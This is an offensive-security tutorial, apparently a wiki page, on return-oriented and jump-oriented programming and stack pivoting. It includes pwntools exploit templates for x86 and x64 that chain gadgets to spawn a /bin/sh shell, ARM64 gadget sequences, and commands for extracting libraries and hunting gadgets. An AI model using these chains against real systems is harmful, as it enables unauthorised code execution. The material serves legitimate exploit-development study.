Return-Oriented Programming (ROP) is an advanced exploitation technique used to circumvent security measures like No-Execute (NX) or Data Execution Prevention (DEP). Instead of injecting and executing shellcode, an attacker leverages pieces of code already present in the binary or in loaded libraries, known as "gadgets". Each gadget typically ends with a ret instruction and performs a small operation, such as moving data between registers or performing arithmetic operations. By chaining these gadgets together, an attacker can construct a payload to perform arbitrary operations, effectively bypassing NX/DEP protections.

How ROP Works

Control Flow Hijacking: First, an attacker needs to hijack the control flow of a program, typically by exploiting a buffer overflow to overwrite a saved return address on the stack.
Gadget Chaining: The attacker then carefully selects and chains gadgets to perform the desired actions. This could involve setting up arguments for a function call, calling the function (e.g., system("/bin/sh")), and handling any necessary cleanup or additional operations.
Payload Execution: When the vulnerable function returns, instead of returning to a legitimate location, it starts executing the chain of gadgets.

Tools

Typically, gadgets can be found using ROPgadget, ropper or directly from pwntools (ROP).

ROP Chain in x86 Example

x86 (32-bit) Calling conventions

cdecl: The caller cleans the stack. Function arguments are pushed onto the stack in reverse order (right-to-left). Arguments are pushed onto the stack from right to left.
stdcall: Similar to cdecl, but the callee is responsible for cleaning the stack.

Finding Gadgets

First, let's assume we've identified the necessary gadgets within the binary or its loaded libraries. The gadgets we're interested in are:

pop eax; ret: This gadget pops the top value of the stack into the EAX register and then returns, allowing us to control EAX.
pop ebx; ret: Similar to the above, but for the EBX register, enabling control over EBX.
mov [ebx], eax; ret: Moves the value in EAX to the memory location pointed to by EBX and then returns. This is often called a write-what-where gadget.
Additionally, we have the address of the system() function available.

ROP Chain

Using pwntools, we prepare the stack for the ROP chain execution as follows aiming to execute system('/bin/sh'), note how the chain starts with:

A ret instruction for alignment purposes (optional)
Address of system function (supposing ASLR disabled and known libc, more info in Ret2lib)
Placeholder for the return address from system()
"/bin/sh" string address (parameter for system function)

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadc0de

# A gadget to control the return address, typically found through analysis
ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control the return address

# Construct the ROP chain
rop_chain = [
    ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
    system_addr,   # Address of system(). Execution will continue here after the ret gadget
    0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
    bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
]

# Flatten the rop_chain for use
rop_chain = b''.join(p32(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

ROP Chain in x64 Example

x64 (64-bit) Calling conventions

Uses the System V AMD64 ABI calling convention on Unix-like systems, where the first six integer or pointer arguments are passed in the registers RDI, RSI, RDX, RCX, R8, and R9. Additional arguments are passed on the stack. The return value is placed in RAX.
Windows x64 calling convention uses RCX, RDX, R8, and R9 for the first four integer or pointer arguments, with additional arguments passed on the stack. The return value is placed in RAX.
Registers: 64-bit registers include RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, and R8 to R15.

Finding Gadgets

For our purpose, let's focus on gadgets that will allow us to set the RDI register (to pass the "/bin/sh" string as an argument to system()) and then call the system() function. We'll assume we've identified the following gadgets:

pop rdi; ret: Pops the top value of the stack into RDI and then returns. Essential for setting our argument for system().
ret: A simple return, useful for stack alignment in some scenarios.

And we know the address of the system() function.

ROP Chain

Below is an example using pwntools to set up and execute a ROP chain aiming to execute system('/bin/sh') on x64:

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadbeefdeadbeef

# Gadgets (hypothetical values)
pop_rdi_gadget = 0xcafebabecafebabe  # pop rdi; ret
ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary

# Construct the ROP chain
rop_chain = [
    ret_gadget,        # Alignment gadget, if needed
    pop_rdi_gadget,    # pop rdi; ret
    bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
    system_addr        # Address of system(). Execution will continue here.
]

# Flatten the rop_chain for use
rop_chain = b''.join(p64(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

In this example:

We utilize the pop rdi; ret gadget to set RDI to the address of "/bin/sh".
We directly jump to system() after setting RDI, with system()'s address in the chain.
ret_gadget is used for alignment if the target environment requires it, which is more common in x64 to ensure proper stack alignment before calling functions.

Stack Alignment

The x86-64 ABI ensures that the stack is 16-byte aligned when a call instruction is executed. LIBC, to optimize performance, uses SSE instructions (like movaps) which require this alignment. If the stack isn't aligned properly (meaning RSP isn't a multiple of 16), calls to functions like system will fail in a ROP chain. To fix this, simply add a ret gadget before calling system in your ROP chain.

x86 vs x64 main difference

Tip

Since x64 uses registers for the first few arguments, it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in x64 architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).

ROP chain in ARM64

Regarding ARM64 Basics & Calling conventions, check the following page for this information:

{{#ref}} ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}

[!DANGER] It's important to notice taht when jumping to a function using a ROP in ARM64 you should jump to the 2nd instruction of the funciton (at least) to prevent storing in the stack the current stack pointer and end up in an eternal loop calling the funciton once and again.

Finding gadgets in system Dylds

The system libraries comes compiled in one single file called dyld_shared_cache_arm64. This file contains all the system libraries in a compressed format. To download this file from the mobile device you can do:

scp [-J <domain>] root@10.11.1.1:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 .
# -Use -J if connecting through Corellium via Quick Connect

Then, you cna use a couple of tools to extract the actual libraries from the dyld_shared_cache_arm64 file:

brew install keith/formulae/dyld-shared-cache-extractor
dyld-shared-cache-extractor dyld_shared_cache_arm64 dyld_extracted

Now, in order to find interesting gadgets for the binary you are exploiting, you first need to know which libraries are loaded by the binary. You can use lldb* for this:

lldb ./vuln
br s -n main
run
image list

Finally, you can use Ropper to find gadgets in the libraries you are interested in:

# Install
python3 -m pip install ropper --break-system-packages
ropper --file libcache.dylib --search "mov x0"

JOP - Jump Oriented Programming

JOP is a similar technique to ROP, but each gadget, instead of using a RET instruction ad the end of the gadget, it uses jump addresses. This can be particularly useful in situations where ROP is not feasible, such as when there are no suitable gadgets available. This is commonly used in ARM architectures where the ret instruction is not as commonly used as in x86/x64 architectures.

You can use rop tools to find JOP gadgets also, for example:

cd usr/lib/system # (macOS or iOS) Let's check in these libs inside the dyld_shared_cache_arm64
ropper --file *.dylib --search "ldr x0, [x0" # Supposing x0 is pointing to the stack or heap and we control some space around there, we could search for Jop gadgets that load from x0

Let's see an example:

There is a heap overflow that allows us to overwrite a function pointer stored in the heap that will be called.
- x0 is pointing to the heap where we control some space
From the loaded system libraries we find the following gadgets:

0x00000001800d1918: ldr x0, [x0, #0x20]; ldr x2, [x0, #0x30]; br x2; 
0x00000001800e6e58: ldr x0, [x0, #0x20]; ldr x3, [x0, #0x10]; br x3;

We can use the first gadget to load x0 with a pointer to /bin/sh (stored in the heap) and then load x2 from x0 + 0x30 with the address of system and jump to it.

Stack Pivot

Stack pivoting is a technique used in exploitation to change the stack pointer (RSP in x64, SP in ARM64) to point to a controlled area of memory, such as the heap or a buffer on the stack, where the attacker can place their payload (usually a ROP/JOP chain).

Examples of Stack Pivoting chains:

Example just 1 gadget:

mov sp, x0; ldp x29, x30, [sp], #0x10; ret;

The `mov sp, x0` instruction sets the stack pointer to the value in `x0`, effectively pivoting the stack to a new location. The subsequent `ldp x29, x30, [sp], #0x10; ret;` instruction loads the frame pointer and return address from the new stack location and returns to the address in `x30`.

I found this gadget in libunwind.dylib
If x0 points to a heap you control, you can control the stack pointer and move the stack to the heap, and therefore you will control the stack.

0000001c61a9b9c:
    ldr x16, [x0, #0xf8];    // Control x16
    ldr x30, [x0, #0x100];   // Control x30
    ldp x0, x1, [x0];        // Control x1
    mov sp, x16;             // Control sp    
    ret;                     // ret will jump to x30, which we control

To use this gadget you could use in the heap something like:
  <address of x0 to keep x0>     # ldp x0, x1, [x0]
  <address of gadget>            # Let's suppose this is the overflowed pointer that allows to call the ROP chain
  "A" * 0xe8 (0xf8-16)           # Fill until x0+0xf8
  <address x0+16>                # Lets point SP to x0+16 to control the stack
  <next gadget>                  # This will go into x30, which will be called with ret (so add of 2nd gadget)

Example multiple gadgets:

// G1: Typical PAC epilogue that restores frame and returns
// (seen in many leaf/non-leaf functions)
G1:
    ldp     x29, x30, [sp], #0x10     // restore FP/LR
    autiasp                          // **PAC check on LR**
    retab                            // **PAC-aware return**

// G2: Small helper that (dangerously) moves SP from FP
// (appears in some hand-written helpers / stubs; good to grep for)
G2:
    mov     sp, x29                  // **pivot candidate**
    ret

// G3: Reader on the new stack (common prologue/epilogue shape)
G3:
    ldp     x0, x1, [sp], #0x10      // consume args from "new" stack
    ret

G1:
    stp x8, x1, [sp]  // Store at [sp] → value of x8 (attacker controlled) and at [sp+8] → value of x1 (attacker controlled)
    ldr x8, [x0]      // Load x8 with the value at address x0 (controlled by attacker, address of G2)
    blr x8            // Branch to the address in x8 (controlled by attacker)  

G2:
    ldp x29, x30, [sp], #0x10  // Loads x8 -> x29 and x1 -> x30. The value in x1 is the value for G3
    ret
G3:
    mov sp, x29       // Pivot the stack to the address in x29, which was x8, and was controlled by the attacker possible pointing to the heap
    ret

Protections Against ROP and JOP

ASLR & PIE: These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
Stack Canaries: In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain
Lack of Gadgets: If there aren't enough gadgets it won't be possible to generate a ROP chain.

ROP based techniques

Notice that ROP is just a technique in order to execute arbitrary code. Based in ROP a lot of Ret2XXX techniques were developed:

Ret2lib: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like system('/bin/sh').

{{#ref}} ret2lib/ {{#endref}}

Ret2Syscall: Use ROP to prepare a call to a syscall, e.g. execve, and make it execute arbitrary commands.

{{#ref}} rop-syscall-execv/ {{#endref}}

EBP2Ret & EBP Chaining: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).

{{#ref}} ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md {{#endref}}

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions
https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html
- 64 bit, Pie and nx enabled, no canary, overwrite RIP with a vsyscall address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html